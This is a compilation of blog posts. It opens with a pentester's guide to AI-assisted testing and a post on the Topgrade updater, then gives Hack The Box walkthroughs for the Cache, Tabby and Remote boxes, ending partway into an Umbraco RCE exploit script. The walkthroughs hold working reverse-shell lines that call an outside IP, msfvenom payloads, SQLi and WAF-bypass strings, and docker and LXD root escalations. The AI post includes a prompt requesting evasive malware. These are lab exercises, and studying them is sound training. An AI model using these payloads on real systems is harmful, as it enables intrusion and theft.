I've been experimenting with AI-powered pentesting tools for the past eight months, running them through dozens of real engagements. What started as curiosity has fundamentally changed how I approach security assessments. The landscape has shifted dramatically, and if you're not leveraging these tools, you're working harder than you need to.

This isn't hype. I'm going to show you exactly how I'm using AI in my workflow, complete with prompts, techniques, and the hard lessons I've learned along the way.

The Reality Check: Why AI Tools Matter Now

Let me be blunt: if you're still doing everything manually in 2026, you're leaving money and findings on the table. I was deeply skeptical when AI coding assistants first emerged. Another overhyped tool, I thought. But after incorporating AI into my recon, exploitation, and reporting phases, I'm consistently finding 30-40% more vulnerabilities in the same time window.

The compound effect is staggering. On a recent web app assessment, AI-assisted analysis of JavaScript files revealed three hidden API endpoints that manual review missed. One of those endpoints had an IDOR vulnerability that gave us access to 50,000 user records. That finding alone justified the entire engagement fee.

The key insight: AI doesn't replace your skills—it amplifies them. Think of it as a force multiplier for your existing expertise.

My Battle-Tested Toolkit

1. AI-Assisted Reconnaissance: Beyond Basic Enumeration

Traditional recon generates mountains of data. Nmap scans, subdomain enumeration, directory brute-forcing—you end up with thousands of lines to parse. Here's how I'm using AI to cut through the noise.

Technique: Contextual Service Analysis

Instead of manually reviewing nmap output, I feed it to an AI with specific questions:

# My go-to prompt for initial service analysis:
"Analyze this nmap scan output. Identify:
1. Services with known CVEs from the past 12 months
2. Uncommon port/service combinations that suggest custom applications  
3. Version strings that indicate outdated or end-of-life software
4. Any services that commonly have authentication bypasses

Prioritize findings by exploitability, not just CVSS score."

This approach surfaces the interesting stuff immediately. On a recent internal pentest, it flagged an obscure Erlang Port Mapper Daemon that I would have glossed over. That service gave us our initial foothold.

Technique: Subdomain Intelligence Correlation

I combine subdomain enumeration with AI analysis to find patterns:

# After running subfinder, amass, etc:
"Analyze these subdomains and identify:
1. Naming patterns that suggest dev/staging/internal environments
2. Subdomains that might be forgotten or abandoned
3. Patterns that suggest specific technologies (jenkins, gitlab, etc)
4. Any subdomains that break the naming convention (potential acquisitions)"

This revealed a forgotten Jenkins instance on a client's network last month. It was still using default credentials.

2. Smart Payload Generation and Evasion

This is where AI genuinely shines. Instead of cycling through PayloadsAllTheThings hoping something works, I can describe my exact situation and get targeted suggestions.

Real-World Example: WAF Bypass

During a recent engagement, I encountered a Cloudflare WAF blocking standard SQLi payloads. Here's the conversation that got me through:

Me: "I'm testing a PHP application behind Cloudflare WAF. Standard 
UNION-based SQLi payloads are being blocked. The injection point is 
in a search parameter. Error messages are suppressed but I can detect 
boolean differences. The backend appears to be MySQL 8.x based on 
error timing patterns."

AI: "For Cloudflare bypass on boolean-based blind SQLi, try these 
approaches:

1. Case variation with comments:
   ' aNd/*!50000(*/SeLeCt/**/1/*)--

2. HPP (HTTP Parameter Pollution) if the app processes duplicates:
   ?search=test&search=' or '1'='1

3. Unicode normalization abuse:
   ?search=test%EF%BC%87%20or%20%EF%BC%871%EF%BC%87=%EF%BC%871

4. If WAF only checks GET, try moving to POST with same param..."

Option 3 worked. The fullwidth apostrophe character bypassed the WAF but was normalized by the PHP backend. I never would have thought of that approach on my own.

Technique: Custom Reverse Shell Crafting

"Generate a Python reverse shell that:
1. Uses DNS over HTTPS for C2 communication
2. Implements basic traffic obfuscation  
3. Works on both Python 2.7 and 3.x
4. Avoids common signature-based detection patterns
5. Includes a persistence mechanism for Linux systems"

The AI provides working code that I then review and modify. Critical point: never run AI-generated exploit code without understanding it. I've caught subtle bugs and even some unsafe patterns that could have burned engagements.

3. JavaScript Analysis at Scale

Modern web apps ship megabytes of JavaScript. Manually reviewing it all is impractical. Here's my approach:

# After extracting and beautifying JS files:
"Analyze these JavaScript files for security issues:

1. Hardcoded API keys, tokens, or credentials
2. Hidden or undocumented API endpoints
3. Client-side authorization checks (that should be server-side)
4. Dangerous function usage (eval, innerHTML, etc)
5. WebSocket endpoints and their message formats
6. Debug/admin functionality that might be accessible
7. CORS configurations or cross-origin communication"

On a SaaS application pentest, this analysis found a hidden /api/v2/admin endpoint that wasn't documented. It was protected by a simple boolean flag in the JWT—trivial to bypass once discovered.

4. Active Directory Attack Path Discovery

For internal pentests and red team engagements, AI accelerates AD analysis significantly:

"I have BloodHound data showing these relationships:
[paste relevant paths]

Given the user 'svc_backup' that I've compromised:
1. What are the most direct paths to Domain Admin?
2. Are there any paths through deprecated/unusual ACLs?
3. What intermediate credentials should I target?
4. Are there any paths that avoid touching Tier 0 assets initially?"

The AI can spot attack chains that BloodHound's built-in queries miss, especially complex multi-hop paths through resource-based constrained delegation or shadow credentials.

5. Report Writing That Doesn't Suck

Let's be honest—writing reports is the worst part of pentesting. I've developed a workflow that makes it almost painless.

Step 1: Structured Note-Taking

During testing, I keep raw notes with a consistent format:

FINDING: SQL Injection in User Search
LOCATION: /api/v1/users/search?q=
SEVERITY: Critical
EVIDENCE: [screenshot paths, requests/responses]
STEPS: 1. Navigate to... 2. Enter payload... 3. Observe...
IMPACT: Full database access, 50k user records exposed
REMEDIATION NOTES: Parameterized queries, input validation

Step 2: AI-Powered Report Generation

"Convert these raw findings into professional penetration test 
report sections. For each finding include:
- Executive summary (1-2 sentences, business impact focused)
- Technical details with clear reproduction steps
- Evidence description
- Risk rating justification using CVSS 3.1
- Remediation guidance with code examples where applicable
- References to relevant standards (OWASP, CWE, etc)"

The output is 80% of a polished finding. I spend my time on the remaining 20%—refining language, adding context specific to the client, and ensuring technical accuracy.

Advanced Techniques I'm Experimenting With

Automated Vulnerability Chain Discovery

I'm feeding multiple lower-severity findings to AI to discover exploit chains:

"I found these issues on the same application:
1. Reflected XSS in search (low - requires user interaction)
2. Missing SameSite cookie attribute (informational)
3. CORS allows arbitrary origins (medium)
4. User email visible in API response (low)

How could these be chained together for a more severe attack?"

The AI correctly identified that the XSS could steal session cookies (no SameSite), exfiltrate them cross-origin (permissive CORS), and the visible email could be used for targeted phishing to deliver the XSS payload. Individual findings went from Low/Medium to a High-severity chain.

Cloud Configuration Analysis

For AWS/Azure/GCP assessments, I export IAM policies and feed them for analysis:

"Analyze this AWS IAM policy for privilege escalation paths:
[paste policy JSON]

Consider:
1. Direct privilege escalation (iam:*, sts:AssumeRole, etc)
2. Indirect paths through service-linked roles
3. Resource-based policy exploitation
4. Cross-account trust abuse"

This has found escalation paths through Lambda execution role assumption that Prowler and ScoutSuite missed.

The Hard Lessons (What Went Wrong)

Lesson 1: AI Hallucinations Are Real

Early on, I trusted an AI-suggested exploit for a specific CVE. The payload looked right, referenced the correct vulnerability, and had reasonable syntax. It was completely fabricated. The CVE existed but affected a different function. Always verify against official sources.

Lesson 2: Context Windows Have Limits

I tried feeding an entire application's codebase for review. The AI started mixing up files, attributing code to wrong locations, and missing obvious issues that appeared late in the input. Now I break analysis into focused chunks with clear boundaries.

Lesson 3: Operational Security

Think carefully about what you're sending to AI services. Client code, internal network layouts, credential formats—all potentially sensitive. I use local models for anything truly confidential, even if cloud models are more capable.

Lesson 4: The AI Doesn't Know Your Rules of Engagement

An AI once suggested a technique that would have crashed a production database. Effective? Yes. Within scope? Absolutely not. Always filter suggestions through your RoE and common sense.

Building Your AI-Augmented Workflow

Start small. Don't try to revolutionize your entire methodology overnight. Here's my recommended progression:

Week 1-2: Recon Analysis - Feed scan results and ask for prioritization. Low risk, high learning.

Week 3-4: Report Assistance - Use AI to polish your finding write-ups. Saves time immediately.

Month 2: Payload Iteration - Start using AI for WAF bypass and payload customization. Verify everything in a lab first.

Month 3+: Full Integration - Incorporate into exploitation workflow, chain discovery, and AD analysis.

What's Next

The tools are evolving rapidly. I'm watching developments in:

• Autonomous agents that can run tools and iterate on findings

• Multi-modal analysis of screenshots and video for UI-based vulnerabilities

• Real-time collaboration between human operators and AI during live engagements

• Custom fine-tuned models trained on security-specific datasets

The security professionals who master these tools will have a significant advantage. Those who dismiss them as hype will find themselves outpaced.

I'm continuing to experiment and will share specific techniques as I develop them. If you're using AI in your security work, I'd genuinely like to hear what's working for you. Drop me a line or leave a comment below.

Stay curious. Stay skeptical. And verify everything.

I am obsessive-compulsive about upgrading the software on my devices. Whether on my iPhone or my desktop, I'm regularly checking for OS or app updates. I want the latest and greatest as soon as it is released. If there is a bug fix, I want it now.

It was only recently that I stumbled upon an app called Topgrade—and it fundamentally changed how I maintain my machines.

The Update Fragmentation Problem

If you're anything like me, your computer is a patchwork of software from dozens of sources. There's your operating system, of course. But then there's Homebrew (or Chocolatey on Windows). Python packages via pip. Node modules through npm. Rust toolchains via rustup. Firmware updates. App Store apps. The list goes on.

Before Topgrade, my update routine looked something like this:

1. Open the Mac App Store, click Updates
2. Open Terminal, run brew update && brew upgrade
3. Remember I haven't updated pip packages in a while, run pip install --upgrade on a few things
4. Oh right, rustup—rustup update
5. Was there a firmware update? Better check System Preferences
6. Did I forget anything? Probably.

This ritual took time. It required mental energy to remember every tool. And inevitably, something would slip through the cracks for weeks.

Enter Topgrade

Topgrade is a single command-line tool that detects which package managers and update mechanisms exist on your system—and runs all of them in sequence. One command. That's it.

topgrade

The first time I ran it, I watched in mild disbelief as it automatically detected and updated:

• macOS system software
• Homebrew packages and casks
• Mac App Store apps (via mas)
• pip packages
• npm global packages
• Cargo crates
• Rustup toolchains
• Vim plugins
• Oh My Zsh
• And more I'd forgotten I even had installed

It felt like someone had finally understood the problem I'd been solving manually for years.

The Alternatives (And Why They Fall Short)

To be fair, there are other tools in this space. Let me give them their due.

MacUpdater is a polished GUI app that scans your Applications folder and checks for newer versions. It's genuinely useful for apps installed outside the App Store. But it only handles applications—not your Homebrew packages, not your development toolchains, not your shell plugins.

CleanMyMac X includes an updater module alongside its cleaning utilities. It's user-friendly and well-designed. But again, it focuses on traditional applications. If you live in the terminal, it misses half your software.

Chocolatey on Windows has choco upgrade all, which is excellent for packages installed through Chocolatey itself. But it doesn't touch Windows Update, winget packages, or your Python environment.

Homebrew alone gets you partway there with brew upgrade, but it knows nothing about your npm packages or your App Store purchases.

Each of these tools solves a piece of the puzzle. Topgrade solves the whole thing.

What Makes Topgrade Superior

Universal Detection: Topgrade doesn't require you to configure which package managers you use. It probes your system and figures it out. Install it on a fresh machine, run it, and it adapts to whatever you have.

Cross-Platform: The same tool works on macOS, Linux, and Windows. If you work across multiple operating systems, that consistency is invaluable.

Extensible: Have a custom update script for something obscure? Topgrade lets you define custom commands in its configuration file. It becomes your single entry point for everything.

Respectful: It asks before doing anything destructive. It shows you what it's about to update. You stay in control.

Fast: Written in Rust, Topgrade is remarkably quick. It parallelizes where possible and doesn't waste time.

Open Source: No subscription fees, no telemetry concerns, no vendor lock-in. It's maintained by an active community on GitHub.

My New Routine

These days, my update routine is simple. Once a day—usually while I'm grabbing coffee—I open a terminal and type topgrade. I watch the output scroll by, occasionally confirming a prompt, and within a few minutes, everything on my system is current.

No more forgetting about that Rust toolchain update. No more discovering three weeks later that Homebrew had important security patches waiting. No more mental overhead tracking which tool updates what.

For someone who genuinely enjoys having the latest software, Topgrade isn't just convenient—it's liberating. It lets me be thorough without being tedious.

Getting Started

Installation is straightforward:

# macOS/Linux via Homebrew
brew install topgrade

# Windows via Chocolatey
choco install topgrade

# Or via Cargo if you have Rust installed
cargo install topgrade

Then just run topgrade and watch it work.

If you're the type of person who checks for updates compulsively—welcome to the club—this tool was made for us. Give it a try. Your future self, with a fully updated system and zero cognitive overhead, will thank you.

Do you have a favorite system maintenance tool? I'm always looking for ways to optimize my workflow. Drop me a note.

This is a fun medium skill level server at Hack The Box. It is a linux Ubuntu box and it had a few fun elements. I learned a lot about memcached for this one. It also requires some sqlmap work so if you aren’t familiar with that tool, I might skip this box for now.

Getting user

Nmap scan

nmap -sC -sV -oA nmap/cache cache.htb

# Nmap 7.80 scan initiated Sun Jun 28 11:07:39 2020 as: nmap -sC -sV -oA cache cache.htb
Nmap scan report for cache.htb (10.10.10.188)
Host is up (0.049s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
|   256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_  256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 28 11:07:50 2020 -- 1 IP address (1 host up) scanned in 10.59 seconds

Looks like port 80 running Apache on Ubuntu. Also ssh on Ubuntu. Nice.

Let's see what comes up on the browser:

And this comes up on the login page:

Let's try some basic passwords like Admin and Password. Nope, didn't work. Lets view source.

This is interesting. Looks like the username and password are:

Username: ash
Password: H@v3_fun

Let's try logging in.

Hmm...

Let's see if there is a special domain name that we need to use in order to get past the "Under-construction page." I'm going to use cewl to generate a word list from the author page:

cewl -w wordlist.txt -d 10 -m 1 http://10.10.10.188/author.html

Now I'm going to use wfuzz to run through that wordlist and show me only domains that return 302.

wfuzz -w wordlist.txt -H "HOST: FUZZ.htb" -u http://10.10.10.188/ --hc 400 --hh 8193

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.188/
Total requests: 42

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                                             
===================================================================

000000037:   302        0 L      0 W      0 Ch        "HMS"                                                                                               

Total time: 0.736105
Processed Requests: 42
Filtered Requests: 41
Requests/sec.: 57.05704

Oh. Looks like there is HMS.htb the domain. Adding that to my /etc/hosts file. Now trying to login:

Oh, a new web site:

Let's see if we can login. Nope.

Opened msfconsole and searched openemr. Found a database dump exploit. Ran that to try to grab the database.

Nope. Tried on a couple of directories and wasn't able to get it to find any tables. Going to try a manual method of this exploit.

Sqlmap injection attack

Using Burp suite, I saved the request from visiting this url:

http://hms.htb/portal/add_edit_event_user.php?eid=1

Save it the request as req.txt.

GET /portal/add_edit_event_user.php?eid=1 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: OpenEMR=on62khuh5v8ktjj5ad57p2sp1i; PHPSESSID=7rlmjgc56ktemn7kmvc062r8bl
Upgrade-Insecure-Requests: 1

Now run Sqlmap to see if we can inject it per the exploit.

sqlmap -r req.txt --dbs --batch

There are two tables of interest. Let's open the openemr database and explore it.

sqlmap -r req.txt -D openemr -tables

Hmm... there is a users_secure table. Let's grab it.

sqlmap -r req.txt -D openemr -T users_secure -columns -C username,password -dump

Now we've got a login!

Username: openemr_admin
Password: $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B.

That password is clearly hashed. Let's break it with john.

sudo john -w=/usr/share/wordlists/rockyou.txt ./hash.txt

Looks like the username/password is:

Username: openemr_admin
Password: xxxxxx

Reverse shell access

Go into the administrator -> files. From there, edit the letter_templates/custom_pdf.php file. Add the following:

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.26/1234 0>&1'");
?>

Make sure to use the IP of your box. Now fire up netcat:

nc -lnvp 1234

Now browse to this page:

http://hms.htb/sites/default/letter_templates/custom_pdf.php

You should have a shell!

You can stabilize the shell using python3:

python3 -c 'import pty; pty.spawn("/bin/bash")'

Now you can su to ash's account using the password we found earlier:

su ash
Password: H@v3_fun

Now go get the user.txt flag in Ash's home folder.

e0b54325d36fc92fe2d538d2a3ed5c7f

Getting root

Now let's get linpeas on here. I downloaded linpeas.sh to my local machine and then ran the python simple http server so that I could wget it from the target box. I'm not showing those steps because you can find 100+ articles showing you how to do that.

Linpeas didn't show much other than there is another user luffy and the server is also running docker and memcached.

docker is running as root. That is totally how we are going to get root. Let's see if we can run docker commands.

ash@cache:~$ docker ps
docker ps
Got permission denied while trying to connect to the Docker daemon socket at unix:///var/run/docker.sock: Get http://%2Fvar%2Frun%2Fdocker.sock/v1.39/containers/json: dial unix /var/run/docker.sock: connect: permission denied

Okay, maybe we need to be Luffy to use docker commands. I guess we need to look at memcached exploits.

We've got memcached running on localhost port 11211. We can telnet into it and view the items in memcache. I had to get help with this part from folks on discord. This is what I did:

ash@cache:~$ telnet 127.0.0.1 11211
telnet 127.0.0.1 11211
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.

stats slabs

stats slabs
STAT 1:chunk_size 96
STAT 1:chunks_per_page 10922
STAT 1:total_pages 1
STAT 1:total_chunks 10922
STAT 1:used_chunks 5
STAT 1:free_chunks 10917
STAT 1:free_chunks_end 0
STAT 1:mem_requested 371
STAT 1:get_hits 0
STAT 1:cmd_set 7140
STAT 1:delete_hits 0
STAT 1:incr_hits 0
STAT 1:decr_hits 0
STAT 1:cas_hits 0
STAT 1:cas_badval 0
STAT 1:touch_hits 0
STAT active_slabs 1
STAT total_malloced 1048576
END

stats items

stats items
STAT items:1:number 5
STAT items:1:number_hot 0
STAT items:1:number_warm 0
STAT items:1:number_cold 5
STAT items:1:age_hot 0
STAT items:1:age_warm 0
STAT items:1:age 50
STAT items:1:evicted 0
STAT items:1:evicted_nonzero 0
STAT items:1:evicted_time 0
STAT items:1:outofmemory 0
STAT items:1:tailrepairs 0
STAT items:1:reclaimed 0
STAT items:1:expired_unfetched 0
STAT items:1:evicted_unfetched 0
STAT items:1:evicted_active 0
STAT items:1:crawler_reclaimed 0
STAT items:1:crawler_items_checked 208
STAT items:1:lrutail_reflocked 0
STAT items:1:moves_to_cold 7140
STAT items:1:moves_to_warm 0
STAT items:1:moves_within_lru 0
STAT items:1:direct_reclaims 0
STAT items:1:hits_to_hot 0
STAT items:1:hits_to_warm 0
STAT items:1:hits_to_cold 0
STAT items:1:hits_to_temp 0
END

stats cachedump 1 0

stats cachedump 1 0
ITEM link [21 b; 0 s]
ITEM user [5 b; 0 s]
ITEM passwd [9 b; 0 s]
ITEM file [7 b; 0 s]
ITEM account [9 b; 0 s]
END

get user

get user
VALUE user 0 5
luffy
END

get passwd

get passwd
VALUE passwd 0 9
0n3_p1ec3
END
exit
exit
ERROR
quit
quit
Connection closed by foreign host.

ash@cache:~$ su luffy
su luffy
Password: 0n3_p1ec3

Now we've got access via Luffy. I'm guessing that now we need to look at docker.

I went to gtfobins and found a way to escalate using docker.

Before I try to install a docker image, let's see what images are available.

docker ps -a 
docker images

Nothing running but we do have the ubuntu image. We can use that to escalate.

This is the command I used to get a root shell:

docker run -v /:/mnt --rm -it ubuntu chroot /mnt bash

Since docker is running as root, this gives you a root shell. Boom! We pwned this box.

054e2a13fc72865189605489c71d6045

Tabby is a box on Hackthebox.eu.  It was a ton of fun and I learned a lot about Tomcat and LXD. This box was hard for me because I'm a novice. I ended up needing help from the HackTheBox discord forums. The folks there are very friendly and helpful.

This box was soooo cool.

Getting user

Nmap

I started this box like all boxes with an NMAP scan.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-24 13:05 CDT
Nmap scan report for tabby.htb (10.10.10.194)
Host is up (0.054s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open  http    Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.50 seconds

Not much here except ssh and http. Looks like Apache and Tomcat.

I browsed the website and saw this:

I browsed the tomcat server on 8080 and saw this:

Looks like the default tomcat page.

Let's run a dirsearch on both sites and see what we see:

python3 dirsearch.py -u http://tabby.htb -e *

Oh interesting. There is a file dir. Can't seem to get to it though. I also checked source on both sites and didn't see any clues. Then I clicked on the News page and saw this URL:

Looks like a candidate for some LFI. I tried reading the /etc/passwd file:

http://tabby.htb/news.php?file=../../../../etc/group

Yep. This is going to be helpful. Let's see if we can view any of those tomcat config files. This link helped me figure out the right path.

tabby.htb/news.php?file=../../../../usr/share/tomcat9/etc/tomcat-users.xml

We can! Oh and look at that login:

So now we have a login that works for admin-gui and manager-script roles:

user: tomcat
password: $3cureP4s5w0rd123!

We can use the manager-script role to deploy a war file on the server which will give us a reverse shell.

Deploy commands for the tomcat manager-script interface look like this:

http://localhost:8080/manager/text/deploy?path=/footoo&war=file:/path/to/foo

We need to build a war file first. Let's use msfvenom to do that.

msfvenom -p java/shell_reverse_tcp lhost=10.10.14.26 lport=4321 -f war -o pwn.war

Make sure to change the lhost to be the IP of your machine. Now we need to setup a netcat to capture the reverse shell:

nc -lnvp 4321

One last thing we need to do. We need to run a simple http server to host our war file. We can do that with python:

python -m SimpleHTTPServer 80

No we can deploy the war file by going to this URL:

http://tabby.htb:8080/manager/text/deploy?war=http://10.10.14.26/pwn.war&name=pwn

Now visit the URL:

http://tabby.htb:8080/pwn

You should get a ping on netcat with a reverse shell. This shell won't be interactive so we should try to upgrade it.

python3 -c 'import pty; pty.spawn("/bin/bash")'

This is better, but we can still do better. Let's take a look in that files directory on the webserver that we saw earlier.

Looks like there is a 16162020_backup.zip file in there. Its in:

/var/www/html/files/16162020_backup.zip

That could have some interesting things in it. Unfortunately it is password protected. Let's move it over to our machine and crack it.

I moved it over to my machine using curl and a simple python script. Here is the python script I ran locally:

#!/usr/env python3
import http.server
import socketserver
import io
import cgi

# Change this to serve on a different port
PORT = 8000

class CustomHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):

    def do_POST(self):        
        r, info = self.deal_post_data()
        print(r, info, "by: ", self.client_address)
        f = io.BytesIO()
        if r:
            f.write(b"Success\n")
        else:
            f.write(b"Failed\n")
        length = f.tell()
        f.seek(0)
        self.send_response(200)
        self.send_header("Content-type", "text/plain")
        self.send_header("Content-Length", str(length))
        self.end_headers()
        if f:
            self.copyfile(f, self.wfile)
            f.close()      

    def deal_post_data(self):
        ctype, pdict = cgi.parse_header(self.headers['Content-Type'])
        pdict['boundary'] = bytes(pdict['boundary'], "utf-8")
        pdict['CONTENT-LENGTH'] = int(self.headers['Content-Length'])
        if ctype == 'multipart/form-data':
            form = cgi.FieldStorage( fp=self.rfile, headers=self.headers, environ={'REQUEST_METHOD':'POST', 'CONTENT_TYPE':self.headers['Content-Type'], })
            print (type(form))
            try:
                if isinstance(form["file"], list):
                    for record in form["file"]:
                        open("./%s"%record.filename, "wb").write(record.file.read())
                else:
                    open("./%s"%form["file"].filename, "wb").write(form["file"].file.read())
            except IOError:
                    return (False, "Can't create file to write, do you have permission to write?")
        return (True, "Files uploaded")

Handler = CustomHTTPRequestHandler
with socketserver.TCPServer(("", PORT), Handler) as httpd:
    print("serving at port", PORT)
    httpd.serve_forever()

curl -F 'file=@16162020_backup.zip' http://tabby.htb:8000

Then I cracked the password using:

fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' 16162020_backup.zip

The password is:

admin@it

Turns out this is also the password for ash's account. We can su to ash on our netcat reverse shell:

su ash

Looks like we have write privs in /home/ash/. Let's generate an ssh key.

ssh-keygen
cp id_rsa.pub authorized_keys

Now copy the id_rsa key from the .ssh folder on to your local machine. chmod it:

chmod 600 id_rsa

Now try to ssh into the box:

ssh -i id_rsa ash@tabby.htb

You should have a full shell. Grab the user.txt file from /home/ash folder.

Getting root

Next I put linpeas.sh on the box by doing a wget from my SimpleHTTPServer:

wget http://10.10.14.24/linpeas.sh

Running Linpeas didn't show too much.

Groups is interesting. Looks like ash has lxd group permissions. We can use this to get access to root. This part was pretty complicated. Took me a few hours to figure it out. This article was helpful.

First we need to get a copy of apline-builder. I was able to do that with this on my local box:

git clone  https://github.com/saghul/lxd-alpine-builder.git

cd lxd-alpine-builder

./build-alpine

Now we need to bring the built file over to our target box. Use the SimpleHTTPServer you still have running.

wget http://10.10.14.26:8000/lxd-alpine-builder-master.zip

Now we are ready to deploy it:

lxc init
lxc init ubuntu:16.04 test -c security.privileged=true 

Now we can get it setup.

lxc init myimage ingnite -c security.privledged=true

lxc config device add ignite mydevice disk source=/ path=/mnt/root rescursive=true

lxc start ignite

lxc exec ignite /bin/sh

This should drop you into a shell. What is cool about this exploit is that we now have root access to the full file system which is now mounted to /mnt/root/. Now you can just go grab the root flag.

cd /mnt/root/root
cat root.txt

This was my root flag:

93b84228c1ba86a98dc62c1b5346d8d4

This is my guide to hacking the remote box over at Hack The Box.

Getting the user flag was very time consuming. There were a lot of little steps that need to all go right. Getting root was above my pay grade. I ended up going to the HackTheBox discord forums to get help there. I learned a lot tackling this box. I feel more comfortable moving around powershell and a windows system.

This box was a lot of fun even though there were moments where I wanted to pull my hair out.

Nmap Scan

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-21 12:31 CDT
Nmap scan report for remote.htb (10.10.10.180)
Host is up (0.055s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
2049/tcp open  mountd        1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 1m22s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-06-21T17:34:16
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 104.33 seconds

The initial scan shows a whole bunch of ports. Let's take a look at the website first.

Looks like the Acme Widget company. There is a link to their intranet, but that page didn't show anything useful. The people page shows a bunch of their employees which could be useful for usernames.

I want to see if that FTP is anonymous, but first I'm going to start a dirbuster to see what else they are hosting on that site.

dirb http://remote.htb /usr/share/wordlists/dirb/big.txt

While that is running, I'm going to see if I can get on their ftp with anonymous.

Anonymous worked on their ftp, but there was nothing on the ftp server. I'm going to make a note of this, but move on to something else.

Nmap rpcbind scan

Since the original nmap scan showed several rpcbind ports, we can try an nmap script to see if there are hidden nfs shares.

nmap -sV --script=nfs-showmount -oN nmap.nfs remote.htb

Running this gave us the following:

There is a NFS volume called site_backups. I wonder what could be in this share? Let's find out by trying to mount it.

sudo mount remote.htb:/site_backups /mnt/site_backups/

Nothing imediately jumped out at me looking at the root. Time to drill into some of those directies.

But first, the dirbuster came back with an interesting folder:

http://remote.htb/install

After browsing to that URL it took me to this page:

This is part of the Umbraco CMS system. Let's google for exploits. Oh, I found this nice one.

I need to be administrator on the CMS in order for it to work. Let's go back to the network share and see if we can find anything Umbraco that can help us.

Boom. In the /App_Data folder there is a file called Umbraco.sdf. That is a database file. Let's see if we can run strings and grep for an admin login:

strings Umbraco.sdf | grep admin

Looks like we have a username and a hashed password. The hash type is SHA1. I'm going to try CrackStation to see if I can crack it.

Username: admin@htb.local
Password: baconandcheese

Let's try logging in as admin.

We are in! Now we can try that exploit which looks like a python script. I modified it adding the username/password we found for the admin and the box IP. I'm sure there are ways to inject an exploit directly into the CMS, I decided to try the python script.

Exploit script hell

Getting this exploit script to work was not easy. There are several things you are doing to need to have setup in order to get this to work.

• Local HTTP server running on port 80
• metasploit configured to catch the session on port 4444
• the reverse shell script in the root of the webserver
• The correct commands for the exploit script

It took me a while to get all of this just right.

First you need to download the exploit script. You can grab it from below:

# Exploit Title: Umbraco CMS - Authenticated Remote Code Execution 
# Date: 2020-03-28
# Exploit Author: Alexandre ZANNI (noraj)
# Based on: https://www.exploit-db.com/exploits/46153
# Vendor Homepage: http://www.umbraco.com/
# Software Link: https://our.umbraco.com/download/releases
# Version: 7.12.4
# Category: Webapps
# Tested on: Windows IIS
# Example: python exploit.py -u admin@example.org -p password123 -i 'http://10.0.0.1' -c ipconfig


import requests
import re
import argparse

from bs4 import BeautifulSoup

parser = argparse.ArgumentParser(prog='exploit.py',
    description='Umbraco authenticated RCE',
    formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=80))
